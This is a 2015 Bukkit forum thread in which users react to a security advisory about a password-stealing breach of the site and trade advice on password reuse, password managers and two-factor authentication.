Forum Security Advisory

Discussion in 'Bukkit News' started by Kaelten, Dec 7, 2015.

Thread Status:
Not open for further replies.
  1. This is why I recommend password managers like LastPass.
  2. Offline


    I don't trust other people with my passwords.
    boomboompower and Gamecube762 like this.
  3. Offline

    mbaxter ʇıʞʞnq ɐ sɐɥ ı

    Keepass then?
  4. Offline


    @mbaxter, i downloaded keepass yesterday ironically.

    EDIT: Just a note. If you share your Bukkit forum password and Bukkit Dev password as I know a lot of people probably do, you know the drill.

    @Kaelten, you may want to extend the breach announcement to Bukkit Dev as I can assure you most users share the same password between them.
    Last edited: Dec 8, 2015
  5. Offline


    Curse, cursed it.
  6. Jesus! I only had a des bukkit programming questions and now everything got haxored....
    I know use another PW, but can i use it for other things or is this Website still haxored?
    Dear God, why did i use the same password on nearly every forum...
    Good that i am to young to own any account affiliated with money.
    This is really sad, especially that they are using them everywhere.
    Lucky Me that my Google Account for ex has a different password.
    Instantly changed my password, everywhere.
    I just wanted to check the time in the night and das the most horror E-Mail ive ever Seen... :(
    But that Moment...
    An lets look on ma tablet.
    New E-Mail.
    From bukkit.
    Is is that guy again who asks something because my Plugin doesnt work for him.
    Looking at the E-Mail.
    Dear bukkit user, basically, you are FUC#-D.
    Now i have to remember where i used this password....
    Last edited: Dec 8, 2015
  7. Offline


    And once again it falls down to EVERYBODY to mop up the shortcomings of so-called Admin.
    Necrodoom_V2 likes this.
  8. Offline


    This is ridiculous.

    Can someone help me? Do I need to change all passwords on any account?

    EDIT by Moderator: merged posts, please use the edit button instead of double posting.
    Last edited by a moderator: Dec 8, 2015
  9. Offline

    timtower Administrator Administrator Moderator

    Where you used the password from Bukkit: yes.
    Other accounts: Changing it on regular bases is wise anyways.
  10. Offline


    My Amazon account (on my secondary email, not the bukkit one) was compromised and I received an email yesterday. Apparantely the password to my email was posted online... Is this anything related to this? It was a different email..just such a coincidence.
  11. Offline

    timtower Administrator Administrator Moderator

    I don't know if it is related.
  12. Offline


    Well, just to get to work then.
  13. Offline


    Does anyone know who hacked? I am assuming it is Valkyrie on twitter, due to the picture on the first page
  14. Offline


    I received the email telling me I may have been compromised but nothing came from it fortunately. This is the only site I use the specific password on so it wouldn't have done much good aside from posting negative stuff on the forums themselves if they did compromise my Bukkit forum account. I was able to log in to change it easily and updated it to a safer one just to prevent anything silly from happening. I would suggest setting all your accounts that offer the feature to text confirmation before password change is available. Most if not all credible email hosts are offering this feature now. It doesn't get much safer than needing the phone in your own hand to gain access to an account and can save you a lot of trouble. I thank the staff here on the forums though for alerting me of this so I could change it in time!

    Good luck to all effected and I hope all gets sorted out soon.
  15. Offline


    Would be a good time to implement Two-Factor Authentication. Preferably U2F.
    ferrybig likes this.
  16. Offline

    timtower Administrator Administrator Moderator

    Is that hardware only?
  17. Offline


    I can almost assure you it isn't a coincidence. Same thing happened to me with my Microsoft account.

    Also, no effort was put forth in proofreading that email. Absolutely none. Zero. And this phrase. "We take your privacy very seriously". This isn't a matter of privacy. This is a matter of security and the most overused phrase ever. Just saying.
  18. Offline


    It's funny, i'm studying about code injections and this happens!
    On the positive, this might help me remember stuff for my exam tomorrow!
    MasterDoctor likes this.
  19. Interesting how fast you can be basically f###ed.
    Luckily nothing has been compromised for me - no spotify, no microsoft account (That would be horrible because my PC PW is linked to it) etc...
    This should remember all of us that using the same password is the dumbest thing ever you can do - no one can say "oh i only register at legit websites" (thats how i thought) but this tells everybody:
    You are not safe.
    On the internet nobody can ever be safe. You can only reduce the risk of being hacked, but every service can be hacked, so never use the same PW!
    But the nice thing is, almost every website that i've changed my PW send me an email: Your PW has been changed, if you did this ignore it else click here{Link to Account recovery} .
    Nice that they're doing this, so if the hackers changed anthing i would have found out and can recover my acc.
    Funny, i told you that on my tablet malicious scam ads popped up on my tablet after logging in and clicking a thread, if Java Script is enabled. It only happened on my tablet, but it only ever happened on this website.
    Nobody believed that bukkit could be related to that.
    I think that isnt a coincidence - malicious Java Scipt opening ads & a malicious JavaScript stealing the Accounts Password seem to match good together.

    I dont understand karma here - people cracking Sony Vegas Pro or Bandicam dont run into issues and people derping around at a bukkit site are hacked.
    TLDR; the website behaved strange on my tablet which doesnt seem like a coincidence and learn to use different Passwords and you wont have a problem.

    I guess i was one of the lucky ones that only got a shock and learned something about Password reusage.
    The same is for usernames: Never use the same Skype as your ingame name. Someone who wants to troll you can type your ingame name in a fancy website, get your IP if it is the same username and then ddos you.

    Interesting i didnt get spam, because the hackers have our email adress too...
    Did anyone get more spam mails then average?
  20. Offline

    timtower Administrator Administrator Moderator

    And you say that based on?
    And how is an ad service related to password stealing?
  21. Because no ad is intendet to redirect to another website and opening scam ads that try to force you to install a virus onto your device.
    I think they have our email adress because that is used to login in the forums?!
  22. Offline


    They have our e-mail address, not password. If your password for your e-mail is the same as your Bukkit PW, yes, they would have it. That's why it's better to have different passwords for each website, even if it does get confusing.
  23. Offline


    Well, an email is required to register a user, and since an administrator can see this information on a user profile, its not out of question.

    Well, depends on how properly or improperly the ads are curated. You can have a malicious ad trying to inject a password tracking javascript, for example. @Tecno_Wizard PMed me a few concerns about tracking scripts from adverts as well, so i wouldnt put that out of question either until this is investigated in full by Curse. Based on IRC logs they didnt exactly caught everything that the malicious hacker has done.
  24. I have a Video of the "ad" popping up.
    I made a thread where you can See it.
    I have reanbled Java Script and now the ad is gone.
    When curse will re enable forum ads we will See if it comes back again - if yes it is an ad - if not the hacker created it.
  25. Offline


    Ok, I have done a ton of research- being very worried D:

    Here are some ways to make sure about your account being safe.. :

    Then, you will need a password manager. The best one is KeePass (

    After this, you should be fine! Make sure to change all your accounts to separate passwords to ensure this hacker cannot do anything with your breached information!

    -- Extra --
    Can anyone tell us who the hacker was?
    Last edited: Dec 9, 2015
  26. Offline


    I can confirm what @IlluminatiGaming said about emails. They were sent as part of the JavaScript too.
    I looked at the actual site source this morning and found the injection (historic of course)

    And illumati- I looked at the site source and no traces of the hackers are left. You probably have adware in your browser.
  27. Offline


    That's nasty. My sincere condolences.
  28. Offline


    I am glad I am not the only one caught up in this. How are you all coping with your data being breached?
    Anyone else got that email stating your info may have been taken?
  29. Offline


    That PM only contained the adverts. There were a total of 18 tracking scripts on bukkit before the ad ones were killed yesterday and many other scripts not involved in tracking still remain, however that does not mean much as tracking only counts as certain cookie and device fingerprinting behavior in the program I use. That does not count anything else that could potentially be malicious.

    It's fairly likely that they are all benign, but never leave anything to chance.
  30. Offline


    I share passwords with my old Google accounts and Bukkit. This explains all the emails I've been getting about new sign-ins from Russia and Kazakistan...
Thread Status:
Not open for further replies.

Share This Page